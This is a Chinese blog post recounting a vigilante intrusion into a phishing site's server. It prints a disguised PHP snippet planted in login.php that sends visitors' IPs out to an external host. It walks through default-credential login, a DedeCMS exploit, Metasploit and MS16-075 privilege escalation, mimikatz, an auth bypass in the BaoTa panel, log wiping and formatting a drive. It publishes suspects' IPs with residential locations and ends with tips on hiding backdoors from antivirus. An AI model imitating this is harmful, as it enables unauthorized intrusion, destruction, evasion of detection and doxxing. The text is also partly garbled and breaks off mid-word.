本文所寫(xiě)的內(nèi)容基本真實(shí)，但有些滲透溯源的過(guò)程為了描述的精簡(jiǎn)被修改刪除。一些無(wú)關(guān)緊要的事情也被略去，但對(duì)滲透至關(guān)重要的大思路和小細(xì)節(jié)我都沒(méi)放過(guò)。同時(shí)在滲透的時(shí)候我沒(méi)有留下截圖，很多圖是我后來(lái)補(bǔ)上的。

1. 引子

事情要從一周前說(shuō)起。

深夜，寢室，我照例空虛寂寞百無(wú)聊賴(lài)地刷群。

突然看到 D小姐姐 在群里面說(shuō)她用了 N 線(xiàn)程給釣魚(yú)網(wǎng)站交了大量垃圾信息，最后卡爆了服務(wù)器，頗為得意。

當(dāng)晚我正好閑著沒(méi)事，就決定小小地得罪一下這個(gè)釣魚(yú)網(wǎng)站，故事就這樣開(kāi)始了。

2. 入侵

首先是基礎(chǔ)的信息搜集，但是當(dāng)我查詢(xún) whois 和微步在線(xiàn)之后卻沒(méi)有任何結(jié)果，顯示的是這些注冊(cè)信息被保護(hù)了，毫無(wú)結(jié)果。最后只知道同一臺(tái)服務(wù)器上運(yùn)行 了很多相同的釣魚(yú)站。

好在 D小姐姐 的垃圾數(shù)據(jù)并沒(méi)有給服務(wù)器造成太大影響，很快服務(wù)器就恢復(fù)了并顯示如下界面：

現(xiàn)在的釣魚(yú)網(wǎng)站的制作者都很良心，界面弄得跟官方的非常相似，可不像當(dāng)年那些隨便畫(huà)個(gè)框框就等著要密碼的，畢竟時(shí)代在進(jìn)步嘛。但這也不是完美的，密碼那里弄成小寫(xiě) qq 的了。

翻看釣魚(yú)網(wǎng)址 ：http://timea.icu/Ru_op/newwap.html

的源碼，我們可以看到作者用了 document.write(unescape(' 來(lái)掩飾網(wǎng)頁(yè)源碼，應(yīng)該是用來(lái)防止被基于關(guān)鍵字?jǐn)r截的防詐騙軟件攔截?

而且網(wǎng)頁(yè)里面還引用了個(gè)有趣的 JS：

window.onload=function() { 
    var date_time='2019-4-2 18:00:59'; 
    
   var time=Date.parse(newDate()); 
   var date1=Date.parse(newDate(date_time.replace(/-/g, '/'))); 
   if(date1<time) { 
       top.location.href='/expire.html'; 
  }; 
  $('#expire-time').html(date_time); 
}; 

大概就是一段時(shí)間后這個(gè)網(wǎng)站就 "expire" 掉了，而 expire.html 長(zhǎng)這個(gè)樣子。

這應(yīng)該說(shuō)明這個(gè)網(wǎng)站不是釣魚(yú)者自己做的而是花錢(qián)買(mǎi)來(lái)的?，F(xiàn)在不愧是社會(huì)主義市場(chǎng)經(jīng)濟(jì)啊，這些搞黑產(chǎn)的已經(jīng)弄成一個(gè)產(chǎn)業(yè)鏈了，有的人負(fù)責(zé)做網(wǎng)站有的人負(fù)責(zé)騙，分工明確各司其職高效工作呢。

接著在檢查沒(méi)有 WAF 后就在登錄處攔截 POST 包，扔到 sqlmap 里面注入：

果真毫無(wú)意外地失敗了。這年頭，連釣魚(yú)站都這么安全了。

我再用 Burp 掃了下路徑，發(fā)現(xiàn)了幾個(gè)有趣的路徑。

這是我剛剛補(bǔ)的圖，本來(lái)這些路徑里面還有 phpmyadmin 的但是在后來(lái)管理員換了路徑所以現(xiàn)在沒(méi)了。我先嘗試了 phpmyadmin 的弱密碼，但是失敗了，轉(zhuǎn)去看別的路徑

最有趣的是在 /membe r路徑中。

沒(méi)想到這一個(gè)簡(jiǎn)簡(jiǎn)單單的釣魚(yú)站需要用到一個(gè) DedeCMS ?

我就順手下了個(gè) DedeCMS 的源碼看看，發(fā)現(xiàn)后臺(tái)路徑 /dede，點(diǎn)進(jìn)去居然有，而且直接用 admin/admin 就登錄了!

后臺(tái)別有洞天，皮膚比 Dede 官方的不知道好看到哪里去。如果 Dede 官方有人看到這個(gè)心里一定會(huì)很慚愧吧。后臺(tái)還可以看到各種釣魚(yú)數(shù)據(jù)，由于暫時(shí)它的后臺(tái)出了些毛病我就不截圖了。

不過(guò)不管這么說(shuō)這只是套了層皮而已，內(nèi)核還是 DedeCMS，我就在 SecWIKI 的 CMS Hunter 搜了個(gè) DedeCMS 后臺(tái)提權(quán)漏洞 《DedeCMS V5.7 SP2后臺(tái)存在代碼執(zhí)行漏洞》：

https://github.com/SecWiki/CMS-Hunter/tree/master/DedeCMS/DedeCMS%20V5.7%20SP2%E5%90%8E%E5%8F%B0%E5%AD%98%E5%9C%A8%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E

,就成功 getshell 了。

2. 第一次不正經(jīng)溯源

是時(shí)候把釣魚(yú)者的IP弄出來(lái)了!

想想釣魚(yú)者會(huì)怎么訪(fǎng)問(wèn)?當(dāng)然是訪(fǎng)問(wèn)后臺(tái)了!于是我在后臺(tái)的 login.php 加上了如下代碼來(lái)記錄 IP。

//檢測(cè)安裝目錄完整性 
function Check($url) 
{ 
      $ch=curl_init(); 
      curl_setopt( $ch, CURLOPT_URL, $url); 
      curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1); 
      curl_setopt( $ch, CURLOPT_CUSTOMREQUEST, 'GET'); 
      curl_setopt( $ch, CURLOPT_TIMEOUT, 60); 
      $result=curl_exec( $ch); 
      curl_close( $ch); 
      return $result; 
} 
$url="http://...:/message.php?info=Another%20"; 
$info=urlencode((string)$_SERVER['REMOTE_ADDR'].(string)$_SERVER['HTTP_USER_AGENT']); 
Check($url.$info); 

其中這個(gè)接收的服務(wù)器是拿S神的服務(wù)器干的，他為了檢測(cè)菜刀流量的行為專(zhuān)門(mén)搭建了個(gè)服務(wù)器供我們?nèi)ト铡?/p>

這樣我在服務(wù)器上面訪(fǎng)問(wèn)/就可以看到 IP 了。

可惜似乎我高興得太早，一天下去發(fā)現(xiàn)登過(guò)這個(gè)后臺(tái)的人遍布全國(guó)各地，估計(jì)是全國(guó)各地都有正義黑客想要干這個(gè)網(wǎng)站吧，但這樣攻擊者的 IP 就被藏起來(lái)了。

看來(lái)我需要提權(quán)，進(jìn)入服務(wù)器，拿到更多東西!

3. 提權(quán)

在提權(quán)之前我還干了個(gè)事情，就是保存整站源碼以查找關(guān)鍵信息免得一會(huì)萬(wàn)一動(dòng)靜太大或者搞崩服務(wù)器導(dǎo)致驚動(dòng)管理員權(quán)限丟失我好歹能留點(diǎn)紀(jì)念品。

進(jìn)入 webshell 發(fā)現(xiàn)命令執(zhí)行的函數(shù)都被禁止了，首先要解決命令執(zhí)行的問(wèn)題。許多人認(rèn)為命令執(zhí)行函數(shù)被禁止就高枕無(wú)憂(yōu) 了，但接下來(lái)的事情證明這是錯(cuò)的。

禁止命令執(zhí)行函數(shù)無(wú)非就是在 php.ini 里面設(shè)置 disable_functions，當(dāng)我的 shell 能夠修改這個(gè) php.ini 的時(shí)候，這個(gè)所謂的防護(hù)就變得沒(méi)有意義了。

執(zhí)行 whoami 命令發(fā)現(xiàn)權(quán)限只有 iis apppoolwww。這個(gè)權(quán)限低的難以忍受，我得想辦法提權(quán)。我祭出了提權(quán)后滲透大殺器 Metasploit。

上傳用 msf 生成的木馬，自己的服務(wù)器再配置好監(jiān)聽(tīng)，webshell 執(zhí)行，成功獲取 meterpreter 會(huì)話(huà)!之后一記 Ms16-075 漏洞拿到 system 權(quán)限!

4. 第二次正經(jīng)的溯源

在拿到服務(wù)器權(quán)限后,我用 mimikatz 拿到了管理員明文密碼。

但是保險(xiǎn)起見(jiàn)我還是先新建一個(gè)用戶(hù)(就是上圖的 360safe)，免得到時(shí)候登上去把管理員擠下去的尷尬狀況。

然后用一個(gè)命令把遠(yuǎn)程桌面的端口查出來(lái)。

C:Windowssystem32>regquery"hklmSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"/v"PortNumber" 
regquery"hklmSYSTEMCurrentControlSetControlTerminal ServerWinStationsRDP-Tcp"/v"PortNumber" 
 
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminalServerWinStationsRDP-Tcp 
   PortNumber   REG_DWORD   0x58d4 

最后成功登錄遠(yuǎn)程桌面!

登錄遠(yuǎn)程桌面后我發(fā)現(xiàn)電腦上幾乎沒(méi)裝什么軟件，除了個(gè)寶塔外就沒(méi)有別的了。

我先搜集了 Windows 日志，在日志中我發(fā)現(xiàn)了一些的東西。

首先呢，非常不幸，我在最開(kāi)始用 msf 提權(quán)的時(shí)候清理了日志，這是我的大失誤，導(dǎo)致 3 月 10 日之前的日志都沒(méi)了。但是不幸中的萬(wàn)幸是，殘存的日志足矣幫助我們找到攻擊者的一些信息。

這個(gè)攻擊者的電腦名字叫做“阿洲”，聽(tīng)起來(lái)像是港臺(tái)片里面的黑社會(huì)，IP 地址拿到了兩個(gè)，一個(gè)是 119.85.162.18(中國(guó)重慶重慶合川區(qū)龍湖美岸(住宅小區(qū))(可信度：99))。

還有一個(gè)是 119.85.166.235(中國(guó) 重慶 重慶 合川區(qū))成功定位!

服務(wù)器上還裝有寶塔，由于我并不知道寶塔的密碼，就直接修改了里面的 php 文件，把密碼判定那里修改了下邏輯，這樣只要我的用戶(hù)名是 360safe 就能(是的，我有一次借刀 360)登錄。

在登陸后我看到后臺(tái)日志，有看到了一個(gè) IP:119.85.164.184 (中國(guó)重慶重慶合川區(qū)美綠居·翡翠名苑(住宅小區(qū))(可信度：99))應(yīng)該是同一個(gè)人。

同時(shí)后臺(tái)還告訴我C盤(pán)有個(gè) HTTP 日志記錄，我迅速下下來(lái),有一次發(fā)現(xiàn)了重慶的 IP 地址訪(fǎng)問(wèn)了 /install 頁(yè)面。

還看到了他用的瀏覽器是 Windows8.1 用的是 Chrome 瀏覽器，這個(gè)盡管與我之前頁(yè)面釣到的 UA 不一樣，但由于都是 win8.1 這樣較為少見(jiàn)的系統(tǒng)，故判定為同一個(gè)人。

另一方面我還發(fā)現(xiàn)了另一個(gè)廣東的 IP: 117.136.39.239(基站IP)疑似同伙，他使用 2345 瀏覽器和 windows7 系統(tǒng)，第一次訪(fǎng)問(wèn)這個(gè)系統(tǒng)就直接訪(fǎng)問(wèn) /dede，并且經(jīng)常在后臺(tái)發(fā)送 POST 包。

除了這些信息之外我就獲取不了別的信息了。

5. 使用了 0day 的不完全溯源

后來(lái)某一天課上完的時(shí)候，我問(wèn)了老師業(yè)界大牛Dr，大牛告訴我可以挖下訊邊緣業(yè)務(wù)的 JSONP 漏洞來(lái)泄漏攻擊者的 QQ。

在嘗試了好幾個(gè)小時(shí)之后，我只挖到了訊的某個(gè)能夠泄漏用戶(hù)名的 JSONP 和度能夠泄漏部分用戶(hù)名的 JSONP 漏洞，我很快將這個(gè)漏洞寫(xiě)成利用腳本，在調(diào)試后部署上去得到廣東同伙的 QQ 名字“龍騰九天”和“怪獸”。

0x06 格盤(pán)跑路

由于我實(shí)在沒(méi)有更多時(shí)間和他們耗，再耗下去我就要掛科了，決定直接破壞造成精神打擊!

關(guān)你的服務(wù)!

格你的D 盤(pán)!

改你的桌面!

(美中不足的是微博二字打錯(cuò)了)

(附注：臟話(huà)僅用于玩梗，并不代表作者本人平時(shí)的素質(zhì)，我的朋友們都可以作證)

沒(méi)有截圖的是我清理日志的部分，這一部分我是做了的只是沒(méi)有截圖，希望各位在做相同事情的時(shí)候注意個(gè)人保護(hù)。

7. 總結(jié)

一些需要注意的滲透細(xì)節(jié)：

• 在滲透的時(shí)候如果能修改 php.ini 就可以突破 PHP 禁止執(zhí)行高危函數(shù)造成的命令不可執(zhí)行。搞 IPS 的時(shí)候可以禁止 PHP 修改敏感文件來(lái)進(jìn)行初步防護(hù)
• 掃目錄挺有用的
• 不管是哪種取證，系統(tǒng)日志都是很重要的突破口。同時(shí)防取證得刪掉日志
• Windows Server 密碼復(fù)雜度有要求，滲透時(shí)賬戶(hù)創(chuàng)建失敗可能是密碼不夠復(fù)雜

不足之處：

1、文中內(nèi)容是精簡(jiǎn)過(guò)的。整個(gè)戰(zhàn)線(xiàn)托的太長(zhǎng)。要積累經(jīng)驗(yàn)

2、留后門(mén)留得太明顯，應(yīng)該留到網(wǎng)站原有的文件里去，最好是分布在多個(gè)文件來(lái)免殺

3、得積累 JSONP 漏洞，不要像我這樣現(xiàn)挖。我都在考慮寫(xiě)一個(gè)掃描 JSONP 漏洞的插件了

4、得積累一些針對(duì)國(guó)內(nèi)軟件(如寶塔)的信息搜集工